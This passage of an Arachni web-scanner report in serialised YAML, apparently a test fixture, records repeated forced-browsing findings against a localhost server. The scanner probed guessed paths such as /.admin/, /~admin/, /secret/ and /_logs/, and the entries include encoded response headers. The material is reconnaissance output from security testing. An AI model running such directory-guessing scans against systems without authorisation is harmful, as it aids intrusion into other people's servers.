headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/signup/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/signup/
injected: signup
id: signup
elem: path
remarks: {}
method: ''
response: signup
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/scans/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/scans/
injected: scans
id: scans
elem: path
remarks: {}
method: ''
response: scans
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/_errors/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/_errors/
injected: _errors
id: _errors
elem: path
remarks: {}
method: ''
response: _errors
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Nw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/recent/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/recent/
injected: recent
id: recent
elem: path
remarks: {}
method: ''
response: recent
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/cache/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/cache/
injected: cache
id: cache
elem: path
remarks: {}
method: ''
response: cache
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/_logs/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/_logs/
injected: _logs
id: _logs
elem: path
remarks: {}
method: ''
response: _logs
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/webaccess/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/webaccess/
injected: webaccess
id: webaccess
elem: path
remarks: {}
method: ''
response: webaccess
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
OQ==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/pics/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/pics/
injected: pics
id: pics
elem: path
remarks: {}
method: ''
response: pics
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/_tests/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/_tests/
injected: _tests
id: _tests
elem: path
remarks: {}
method: ''
response: _tests
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/.adm/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/.adm/
injected: .adm
id: .adm
elem: path
remarks: {}
method: ''
response: .adm
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
NA==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/.admin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/.admin/
injected: .admin
id: .admin
elem: path
remarks: {}
method: ''
response: .admin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/~admin/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: true
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/~admin/
injected: ~admin
id: ~admin
elem: path
remarks: {}
method: ''
response: ~admin
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/secret/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/secret/
injected: secret
id: secret
elem: path
remarks: {}
method: ''
response: secret
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Ng==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/db2/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/db2/
injected: db2
id: db2
elem: path
remarks: {}
method: ''
response: db2
headers:
request:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
User-Agent: Arachni/v1.0dev
response:
!binary "WC1GcmFtZS1PcHRpb25z": !binary |-
U0FNRU9SSUdJTg==
!binary "WC1Yc3MtUHJvdGVjdGlvbg==": !binary |-
MTsgbW9kZT1ibG9jaw==
!binary "WC1Db250ZW50LVR5cGUtT3B0aW9ucw==": !binary |-
bm9zbmlmZg==
!binary "Q29udGVudC1UeXBl": !binary |-
dGV4dC9odG1sO2NoYXJzZXQ9dXRmLTg=
!binary "Q29udGVudC1MZW5ndGg=": !binary |-
Mw==
!binary "U2VydmVy": !binary |-
V0VCcmljay8xLjMuMSAoUnVieS8xLjkuMy8yMDEzLTAxLTE1KQ==
!binary "RGF0ZQ==": !binary |-
TW9uLCAxMSBGZWIgMjAxMyAwNjoxOToxMyBHTVQ=
!binary "Q29ubmVjdGlvbg==": !binary |-
S2VlcC1BbGl2ZQ==
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations: []
internal_modname: CommonDirectories
internal_modname: CommonDirectories
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
url: http://localhost:8099/mrtg/
elem: path
method: ''
name: Common directory
description: Tries to find common directories on the server.
tags:
- path
- directory
- common
- discovery
cwe: '538'
cwe_url: http://cwe.mitre.org/data/definitions/538.html
severity: Medium
remedy_guidance: Do not expose file and directory information to the user.
mod_name: Common directories
variations:
- !ruby/object:Arachni::Issue
verification: false
references:
CWE: http://cwe.mitre.org/data/definitions/538.html
OWASP: https://www.owasp.org/index.php/Forced_browsing
opts:
:regexp: ''
url: http://localhost:8099/mrtg/
injected: mrtg
id: mrtg
elem: path
remarks: {}
method: ''
